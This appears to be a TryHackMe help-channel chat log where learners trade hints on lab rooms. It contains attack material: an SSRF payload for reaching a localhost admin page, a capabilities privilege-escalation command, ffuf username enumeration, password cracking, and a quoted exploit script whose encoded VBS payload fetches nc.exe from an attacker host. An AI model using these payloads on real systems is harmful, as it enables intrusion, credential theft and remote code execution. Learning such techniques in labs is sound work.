don't feel too bad. last night instead of copying the source code of an exploit from exploit-db, I used wget on the actual web page to send to my local machine. Not realizing that it wasn't giving me the exploit source code, it gave me the web page source code

almost referred to the walkthrough until at the last minute I decided to open the source code and see if I could figure something out and saw that it was HTML

oh lol It happens

Hi, question about Wireshark 3: traffic analysis module
i am on the section HTTP traffic on the user-agent section and they want me to spot the frame number with a minute spelling difference in the user-agent field
but, for the life of me I cannot find it, I have been staring for hours. Can someone nudge me in the right direction

I added the user-agent field as an extra column, but not a single user-agent except for the malicious ones seem misspelled to me, 32 seems off but that's not accepted as the answer, and probably shouldn't be anyways

nvm, found it already lol

Im in task 22 OWASP 10-2021 in final task there is an extra question that is

Going the Extra Mile: There's a way to use SSRF to gain access to the site's admin area. Can you find it?

can someone explain what to do ? I'm curious

Task 8 in windows fundamentals part 1, I don't have a clue, everything I've tried.

||In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?||

I just need a hint, as to where to look for it.

I'm just getting redirected to settings page.

Remember the earlier task in the module where you exploited the file download using the url associated with the "Download Resume" button? You can use the same exploit to access the /admin page as localhost. You will need to know how to escape the id at the end to make it work though. Finding how to url encode "#" to escape the id will will help. Hope those are enough hints to get you through it.

That's where you need to be

Now change it to small icons

Nothing still, the option is just coming to the taskbar icon settings.

I'm going to have to boot up a machine to see how I did it, my host is different.

You there?

Yup

Use this screen.

I've got my cursor over Network etc.

Just ignore that

I was using that, on A&P.

still couldn't get anywhere

What about View By: ?

Oh damn, thank you!

Gave +1 Rep to @lucid junco

is there a bug in easyctf?

i got the second question but its wrong

like i got the answer correclty because i filled in a couple of services i knew after doing an nmap scan

but using the nmap scan i see port 21 and port 80

not port 22

there are 2 ports under 1000 that was correct

so whats up with that

For what is running on the higher port question?

ye

the higher one would be port 80 right

like the higher one of the 2

OH BRUH i got it... its a bit dumb cuz thats higher than 1000

misunderstood the qeustion there

Yeah. Just now saw

I thought you got only two ports in your nmap scan

so i was on the right track but i couldnt figure out the syntax necessary to get to the admin page... just got valueerror page... is the # you mentioned commenting out the id? i tried dropping || %23 in a few spots thinking that|| but it didnt work

You will only need one %23 and it goes just before the &id. If you have a payload like this: http://site.com:8087/download?server=files-site.com:8087&id=1234 - there isn't much you will need to change if you want to access "/admin" on "localhost". Make sure you include the port number.

We don't help with private rooms here, please contact the room creator

i really thought i tried that lol

thanks for the help

Gave +1 Rep to @pulsar turret

wait whats a private room?

i'm on a private room

It's a room that isn't set to public

Were you able to solve it? Show me your payload and I may be able to point out where you're going wrong.

so only the creators share them?

Mhm

im stuck working now, im gonna go back to it later

i thought i tried http://site.com:8087/download?server=$ip_of_target_box:8087%23&id=1234...

but maybe i forgot port like you said

ill look again

Sometimes private rooms are made by teaching institutions/teachers and could be tests so that students don't have the answers available on the web. I think that's why they don't allow help with private rooms here.

what kind of account can create private rooms? has to be biz or edu?

Ahh, I can see where you've made a little mistake, you have the %23 in the right place, all you're missing is the page on the site you're trying to access

Anyone can create. Because i saw some private rooms while playing some ctfs

oh i forgot to edit the start of the link? it was like "/download"..."?server""...

that was prolly it... thanks again

Gave +1 Rep to @pulsar turret

You're trying to access the restricted page that's only available as localhost, so instead of $ip_of_target_box as server, try localhost:8087/supersecretpage 🙂

ahhhh duh hahah

lol what a dingus

Don't worry, we've all had those moments. I've lost count of the amount of times where i've had just one small parameter or misspelling that's held me up for hours, or just completely overthought something and missed the obvious

Why are null, fin, Xmas scans generally used?

Slight ptsd of when I was studying web dev and I would be making some adjustments then my screen would go completely white after refreshing the page

Only to find that it was a missing semicolon at the end of one of the 300 lines of code

https://nmap.org/book/scan-methods-null-fin-xmas-scan.html#:~:text=The NULL%2C FIN%2C and Xmas,than even a SYN scan

They are generally used to evade something on a network.

What do you think that could be?

guess i worry about the same thing in the case private rooms be asked to help with, are they maintaintained to still be accurate to be finished months or yrs later? if the tech changes and you use your own kali install and get stuck because it is too linear and progress depends to a successful ctf depending one something deprecated in your pentesting setup or even in an updated attactbox then you can't move on and complete the cert

I also have another question will there ever be, or are there any I dont know of yet, proctored rooms in future plans? proctoring requires extra effort but that would also be a way for THM to make an extra profit I guess

So I'm on the cookie tampering task and the question is encoding the value in base64, I'm copy-pasting the encoded value and getting the answer wrong, is there something else I need to do?

Okay nevermind, I solved the question.

is it just me or do cookies often stranslate into funny chinese statements aafter cyberchef's magic does its thing\

Good morning, I am doing the "tomghost" room, I got the first flag, I am in the privilege escalation process and I see two files 1) tryhackme.asc 2) credential.pgp, I tried to do an attack with john to get the passphrase of tryhackme with the rockyou dictionary but it doesn't send me anything (I already got the hash with gpg2john), by chance could you give me any suggestion, the command I use is

john hashp -w /usr/share/wordlists/rockyou.txt

okey i check and i see my error, teh correct command is john --wordlist=/usr/share/wordlists/rockyou.txt hashp

I still can't get the second question on nmap

On task 8

in what room

Nmap

Task 8

The answer is in the last paragraph of the task. I recommend you refresh the page in case you have entered the answer multiple times.

Got it thank you. I don't see how that question matches the answer well

you are welcome

hi,

i'm doing "memory forensics" room with volatility 3
I would like to read a registry key value. I have the offset but i do not find any way to read or dump it... Any help ?

┌──(kali㉿kali)-[/opt/volatility/volatility3-2.4.1]
└─$ python vol.py -f /home/kali/tryhackme/memory_forensics/Snapshot19.vmem windows.registry.printkey | grep CurrentControlSet
2020-12-27 22:50:31.000000 0xf8a000024010inKeyed \REGISTRY\MACHINE\SYSTEM CurrentControlSet True

no volatility 3 user ?
I used v2 but trying to use the new one (without success for the moment)

What optional argument can the ftp-anon.nse script take?

NMAP

found it using bing-- and have no idea where to find in in the room lol

It's not in the room, you were indeed supposed to search and find out yourself

👍

I am doing the Attacking ICS Plant #1, but I don't get how I the python scripts from tryhackme webpage to the VM. Any knows how to do this?

I am not able to run the scrips provided within the VM

Thank you for your help on this one! I learned a lot just from this one insight

Gave +1 Rep to @pulsar turret

Hey everyone. I am working on Network Services. It's wanting me to figure out the username and I think I need a little hint or directionin that area

We used a SMB share to download a auth key.

I am assuming I need to use that to ssh into the server?

Rescind that ask for help. Looked it up and found someone who had the similar problem and I of course was making the same mistake. Whoopise. Thank you for whoever was considering a response 🤣

Hi all....uhm.... so... "root me" room... ive found the obvious binary which should be used - but the intended way (via gtfobins) is not working (not permitted) - any hints?

Hey, when you say "it's not working", what do you mean? What did you try? What error message are you getting? We can't help if we don't know what you're seeing 🙂

Yes, you are absolutely right - i hope its okay to post the command+output here. Im running this to escalate as per gtfobins on python, after getting on the box with a revshell: sudo setcap cap_setuid+ep python and its then (correctly?) asking for a password - which imho it should not, as /usr/bin/python is SUID.

You're using the instructions for Capabilities, not SUID

FFS - thanks so much, i got it now!

Glad to hear it 🙂

should've tried harder - i know 😅 when reading is too difficult, its time for a break 😉

Happens to the best of us, coming back with fresh eyes can really help, and next time you'll know to double-check

+rep @forest drift

Gave +1 Rep to @forest drift

oh

You know that would have been a ghost ping if I wasn't here already 😄

Done!

yea sry. i can ping you again 🙂

All good 😄

Guys, I want to talk abou tthe room called VulnNet Internal

It is listed as Easy. Well is it rated right to be easy , I just finished it but even after going through the walkthrough I don't think itshould be qualified as Easy. Appreciate all thoughts.

Some one who solved it , how do you find the room. I don' tthink that most of the things done there for Privesc atleast comes intuitively.

Hello! Tell me please, who understands. I bind the mac address to the router and the Internet disappears. Why is that?

рHi all

I have question

room The Marketplace
I make stored xss but cookie admin dont steel, my cookie goot steal

Help pls ^^

whats your payload?

Windows noob here. I'm stuck in Windows Fundamental I, task 7. How do I RDP to the standard user? Is the standard user tryhackmebilly? Can't find the correct name or password.

Hi, i'm looking for a reporting tool that allow me to follow all my finding and exploitation path. Someone told me about obsidian, is it a good idea ? another idea ?
when i do complex chall i find many artefacts/creds but it is difficult to keep a global view (i report to a txt file via VI for the moment)

Hello! I'm in the Upload Vulnerabilites room and I'm currently doing Task 7. Up to this point, I've used gobuster to find the directories on the website, figured out what file extensions the website will take, set up the reverse shell to match what is on my linux machine with the port 9999, changed the MIME type to have the website download the reverse shell using Burpsute, set up a netcat listener on the prementioned port and navigated to the directory where the files are stored. My issue is that when I have the netcat listen on the port and I navigate, the page stays blank and the listener isn't picking up anything. Burpsuite is off so no requests are hanging, and I did confirm that the linux ip address matches, so I was wondering if I could have a hint on what I'm doing wrong.

I really like obsidian note, here is a good article and a base of how i am also using it. https://www.trustedsec.com/blog/obsidian-taming-a-collective-consciousness/

Hello I can't solve task 2 in web application risk Anyone help me please?

Share the room link.

It is in a Introduction to Offensive Security ( in web application risk ) .. The answer, as I expect, should be "Brute force" for the first question and " Cryptographic Failures "for the second question, but the answer formula is required to be 10 characters only!!

Can you share the room URL please?

Second answer is correct but the first one is not. Read the whole section again.

https://tryhackme.com/room/introwebapplicationsecurity
He is talking about this room if I’m not wrong.

It is.

The answer to Question 1 is not ten characters long.

The first word in the answer is > 10 characters.

Can you tell me the correct answers?
I have tried several times to make the answer exceed 10 characters, but the result is always wrong and limited to 10 characters.

We are not just giving out answers, rather than guiding you to find it on your own 🙂

You read the question and fount that the scenario falls under cryptographic failure category. Do the same with first question.

Thank you
it was my mistake. Finally got the correct answer

hi everyone,
I have all the questions but one for the room named caseB4DM755 - its a Digital Forensics thing.
The question is asking for GPS coordinates supposedly.
but the answer seems to be in the form
********.*** *********.***
that makes no sense to me. I tried entering the co-ordinates in all kinds of ways. What am i missing ?

can you link the room pls

#1114253007098499183 ... it is the new one

ah

thanks

Hello, is anyone here? Can some take a look at the ssh login password for this one? I dont know what I'm doing wrong but cant seen to ssh into the machine. Its the first tasks of Networking Services. Whats the ssh login/pass???https://tryhackme.com/room/networkservices

You are not supposed to ssh into that machine, that's why no credentials are provided 🙂
You have to follow along and enumerate/exploit the target machine with either the attackbox or your own attacking machine

Ohhhhhh!!! Hahaha Omg are you serious!? Ha sheesh I feel dumb, but that makes total sense if you are just scanning!! Wow thanks!! Just ran the commands and its groovin'

Gave +1 Rep to @left thunder

Hi, getting an issue viewing files in the machine "brainstorm":

230 User logged in.
ftp> dir
229 Entering Extended Passive Mode (|||49273|)

And it freezes and disconnects
EDIT:
connected to the ftp, wrote:
passive off
and it's working.

I seem to have the very wrong idea of what GPS co-ordinates are ... the format suggests DDMMSS.sss but it is not .... I am at a loss and I am guessing it is some sort of specialist thing that I have never been exposed to before. Shame for such a good room. Also when XKCD cannot help ... https://xkcd.com/2170/

Unfortunately that's a private room so we can't access it and help

Ayyy okay, I’ll do my best then!

that's just bypassing a restriction that's there for a reason

Oops. Sorry

I Can delete the post

@ancient elk please don’t post rooms that haven’t been through the room reviewal process

Okay, noted. Sorry!

Hi guys, im trying the room: 'intelligence tools'

Task 5 says: what is the originating ip adress? Defang the ip adress.

So the eml file is on this machine. But i dont have anytool to use in that machine to look for headers or something in the eml.

And what do they mean with cyberchef has a defang recipe..

Cheers hami

Nvm i got it thanks

Guys I'm stuck on this question:
Referring to the technique from question 2, what mitigation method suggests using SMS messages as an alternative for its implementation? ( I know it's something to do with Authentication but I'm honestly so stuck )

@white salmon is it 2factor authentication, or no?

Yes, but the answer doesn't fit, I think it's worded differently

multi-factor authentication ?

Omggg it worked lmaoo, thank u so much

Gave +1 Rep to @crisp nimbus

loool np 😄

Hey y'all

I just need a little hint with the "Brute Force Heroes" room on the Potator section

can't figure out the correct syntax and I couldn't fine any tutorials of Potator on Youtube

Hey, so im stuck in the forensics room task 1 question 4, i know the command for volatility2, but don't know what it is for volatility3 got any tips?

which room are you in? There are a handful of forensics rooms.

this makes no sense

what am I missing

nevermind

Hey, anyone able to guide me in the right direction? Im doing the easy room "Startup" everytime I run "put" while in the FTP shell, i get a 553 error.

What are the permissions set in the folder your are trying to copy a file into?

Im no longer on that room, but Im not sure. Ill have to check again.

Hello! I'm currently working on solving the authentication bypass section of TryHackMe. As far as I understand, what I need to do is deal with a login page where already registered users are checked. The idea is to save these registered usernames to a file and then use that file for brute force attacks. When I run the following command, I expect the usernames to be stored in the valid_usernames.txt file:

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.98.147/customers/signup -mr "username already exists" > valid_usernames.txt

I'm not encountering any errors with this command, but the valid_usernames.txt file remains empty. As a result, I'm unable to proceed with the brute force attack. If anyone has knowledge about this issue, I would appreciate their assistance

if you leave the "> valid_usernames" part, do you see ffuf actually going through the ~10.000 names? There should be a little progress indicator

Yes, I see ffuf going through approximately 10,000 names even without the "> valid_usernames" part. However, it still doesn't output anything to the file, and I can't figure out the reason behind it.

Can you maybe send a screenshot of what it looks like, the command looks okay to me and I tried it earlier and it worked fine

I will try it and send you a screenshot when the machine is available again. Thank you in advance 🙂

in the room "Walking an application" question 3 on Task 3 does not explain how or where to find the answer. could someone clarify it?

Hello! I'm in the "Network services" room and I am trapped in the question <<What variant of FTP is running on it? >>

My first impression would be to answer "passive", as it is awaiting for the client to make the connection. But this word (and 6 character variants) do not work.

I searched for the "FTP variants" concept, getting no results to what are the option. So I am lost in what I should be looking for. Any hints?

sometimes you have a url that looks like "website.com/images/1.png" which looks like 1.png is in the directory "images" on the webserver. And if the server is misconfigured then you can try manually accessing "website.com/images" and it might show you all the files in said directory, even the ones you aren't supposed to see

its asking for the server software used

oh I see! got it, thank you

Gave +1 Rep to @peak grotto

Hey guys I’m stuck on nmpas “what optional argument can the ftp.anon.nse script take”. I read the paragraph several times. Not asking for the answer just a general direction to be steered in.

Ty

go to the official nmap documentation and read about the script, it's not in the text on thm

Tried that to but I’ll read it again thanks.

Gave +1 Rep to @forest drift

I checked, it's definitely on the page of the script

Is it on chapter 15 nmap Scripting Engine (NSE)?

Nvm got it thank you

Glad you got it 🙂

That was really smooth wording! thank you so much

Gave +1 Rep to @peak grotto

use -o output-file -of output-format

you can use -of csv and then isolate the usernames with awk

ffuf -w in-file.txt -X POST [...] -u http://target.example.com/login -o valid_usernames_temp.txt -of csv

awk -F, '{print $1}' valid_usernames_temp.txt > valid_usernames.txt

video + fix if stuck on incorrect line endings or escape/control characters in file #web-fundamentals-path message

hey, doing once piece room, can't decode 3rd and 4th poneglyphes, like something is missing, I can add something fill but there are multiple possibilities.
nvm it was just concating all of them together, so simple.

Hey people! I'm on the file inclusion room challenges and am a bit confused. By following the paths should we have the knowledge on how to do them or additional rooms are needed ? I've completed the HTTP Web basics, but aside from sending POST requests in the incorporated tool from the room, i haven't done it otherwise. I would prefer a hint'/direction to go on as opposed to straight answers. Thanks!

figured it out 😄

hi! in the Yara room, this task:

Inspect the actual Yara file that flagged file 1. Within this rule, how many strings are there to flag this file?```

i'm a bit lost on how to see which file i should be looking at; and am i just dumping it into nano?

Hey, I just started the Nessus Room. Created an account, started the nessus service on the Kali machine, activated with the activation code, started Nessus. Now when I want to follow along the questions of that room, I saw that most of the required buttons in Nessus are greyed-out for some reason. Any ideas?

EDIT: Just saw a popup, that Nessus is compiling still. Then I have to wait I guess 🙂

Not sure if you still need help. I also needed help with this and looked online yesterday. The person used nano yara/thor-webshells.yar to look into the .yar file so they can search for the strings, which is needed for the answer.

I hope it helps a bit.

thank you! i ended up resorting to a video walk-through bc i'm a hack and a fraud lol. will revisit the room with this info, tyty

Gave +1 Rep to @wooden jetty

I dont think youre a fraud. We all start somewhere. I had to use a video too. I did feel like the question was worded strange to me though! Maybe it was the same for you.

Stuck on https://tryhackme.com/room/windowslocalpersistence - Task 6 - Last Question, not sure why its not working, hint welcomed

Hello, in the Wireshark Packet Operations room (https://tryhackme.com/room/wiresharkpacketoperations) Task 5, final question, it asks me "What is the number of "type A DNS Queries"?". I believe I typed the filter right with dns && dns.qry.type == 1 but I'm getting a 3 digit answer. The answer seems to be 2 digits. Is this a bug or do I need to change the filter?

You should add a response flag as well if I'm not mistaking.
dns.qry.type == 1 is good but you have to add a response flag

So to be complete : dns.qry.type == 1 && dns.flags.response == 1

Oh! That was it!

I'm curious why I need a response flag since I thought I needed to filter any DNS queries with an A type. Would you happen to know or direct me to somewhere where I can find out more?

@elder lagoon

Ah I figured it out. Apparently I forgot there is an answer to responses. Using dns.qry.type == 1 provides both queries and responses.

Exactly! Sorry didn’t see your message 🙂

Hi I'm stuck on year of the rabbit, I ||got to the part where I have to turn off JS and did so, however the redirect does not mention a hidden directory at all, it just has me go straight to the page with the video||

First request ||

Host: 10.10.110.248
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close````
||

I forward that, then obtain:
|| ```
GET /assets/RickRolled.mp4 HTTP/1.1
Host: 10.10.110.248
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Referer: http://10.10.110.248/sup3r_s3cret_fl4g/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Range: bytes=0-
Connection: close

Are you using Burp to intercept the request? Have you looked at || http history after forwarding the request|| ?

Yes and yes

I solved it, || The URL's for the page ended up being slightly different think 3 instead of e||

Yeah, I remember struggling with it too, you can thank @inland onyx :p

Gave +1 Rep to @inland onyx

anyone available?\

Im trying to find this last flag for my task but i cant access the file directory anymore (even though i accessed it just 10 min ago) https://10-10-80-64.p.thmlabs.com/assets/

how websites work - html injection into name field??? not getting it.

how websites work - html injection into name field??? step 5, not getting it.

sorry task 5 not step 5

gorget it, i got it finally, lol

https://tryhackme.com/room/velociraptorhp

Task 3, last question:
In the Shell, run the following PowerShell command Get-Date. What was the PowerShell command executed with VQL to retrieve the result?

I should have the right answer, I've checked it every way I know how, but the room isn't taking it.

Answer I've got matches the one walkthrough that I've found.

Note:
On the Subdomain Enumeration task 6 the answer to question "What is the first subdomain discovered?" it's not correct. The first subdomain is not d****.

Blaster machine is not working according to the walkthrough!

In easypeasy, is the 2nd flag encoded in the || hidden/whatever|| bg image? if not can I have a hint, || or is it the outdated nginx? ||

Guys, in the room Blaster is it designed in the way like, we are not allowed to restart the machine?

For testing the persistence

@fleet spire go back and check you nmap scan 😉 you might need to do something slightly different with it

I've tried several, maybe I got it but I don't know what todo with it... help?

did you use with the -p- switch

when you was doing you nmap scans @fleet spire

why would I need -p-?

I know the ports

so you know the ports starting 655

yes

do i need
||to post reuqest?||

that will be needed for a later part. Did you check the robots.txt file on the other server

yes

I wasn't sure what to do with it tho

okay if you have the user agent text from that robots text. you need to find a site that will be able to crack it as it is a md5 hash

what user agent text

theres nothing in the site

.

so you are not opening http://ipaddress:65524/robots.txt

there is another webserver on that port. Thats why i said about scanning all ports with nmap using -p-

apache

but how was I supposed to know there was gonna be a robots.txt?

the nmap scan wouldnt give it to me i think

was i supposed to run dirb on the specfici port?

Yup

If you don't specify a port, it will default to 80.

ok thank you so much ill know better next time

no probs @fleet spire

Also when visiting a web site for the first time. It can be handy to check for robots.txt. As it can be helpful as it will list directories that web crawlers should not index

i see

got any favorite site for md5 cracking or just google

@fleet spire normally I go to crackstation first and then google if it don't work there

crackstation didn't crack it

i tried 10 different hasing websites but then i entered it to google and it found it in an instance 💀

@grave hinge would it be ok if I dm you instead of spam this channel?

It was working fine for me . Where went wrong for you?

i did it today after few hrs you posted .

By running a directory bruteforcing tool

You need to add -p- when you do your nmap scan against the host, otherwise, it will only scan against the top 1000 most popular ports and not the entire 0 to 65535.

yeah i got that

Can anyone help me for a question from Regular Expression room. I am just stuck in Task 5 last question. Rest all are done. 😖

I'm looking for the answer from the groups section on the mitre website. It's asking how many techniques are attributed to this group? - MITRE ROOM

Also looked up the answer and it's not accepting it? SOS

Never look up the answer

hey im trying to figure out the agent sudo room and im up to the part where the i can read the contents of ||Agent C txt|| where it says ||the password for Agent J is stored in the picture || i tried to get the pictured metadata using imagemagick and also extensively checked the picture itself, can anyone point me in the right direction?

Got it, my answer earlier was not working I sat counting them over and over for both groups mentioned and the tool

Hi I am having trouble in task 4 of steel mountain https://tryhackme.com/room/steelmountain
I changed the exploit to match my local ip and port then started a python web server and nc listener before running the exploit using python filename rhosts rport and I get this error:

  File "/home/kali/Downloads/39161.py", line 37
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
                                                                                                                                                                                                                                              ^
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 2-3: truncated \UXXXXXXXX escape

How do we use "grep" to search for a pattern in multiple files?

❗ ❗ please i need help with the vim room

grep -rl {PATTERN}

use python2 not 3

Can't remember the image as it has been some time since I worked on the machine. Have you tried || binwalk || or || steghide||?

can I have a hint? I'm stuck on root in easy peasy
|| I found the swap file ( no idea if it helps ) but i have no idea what tod owith it ||

having a bit of trouble with OWASP Top 10 - 2021 / 4. Insecure Design:
||i've gone through every colour on the most common colours list, and i'm not sure if i'm just not checking enough of them, if capitalization is a problem, or i've done something wrong somewhere...||

edit: ||it was capitalisation.|| the best hint one can have is the act of asking for help...

Hey i finished the room, but yes i was supposed to use binwalk on one pic and steghide on the other

I did see it, didn’t check it tho

so the || swapfile || isnt related?

In task 9 of https://tryhackme.com/room/networkservices it is asked which variant of ftp is running, I read the previous task, searched on the web and partially read the IETF document but I don't have a clear idea of what is asked, I tried the obvious answers but it didn't work either

nmap -p 21 -v -sV MACHINE_IP

Thank you very much !

Gave +1 Rep to @fathom dome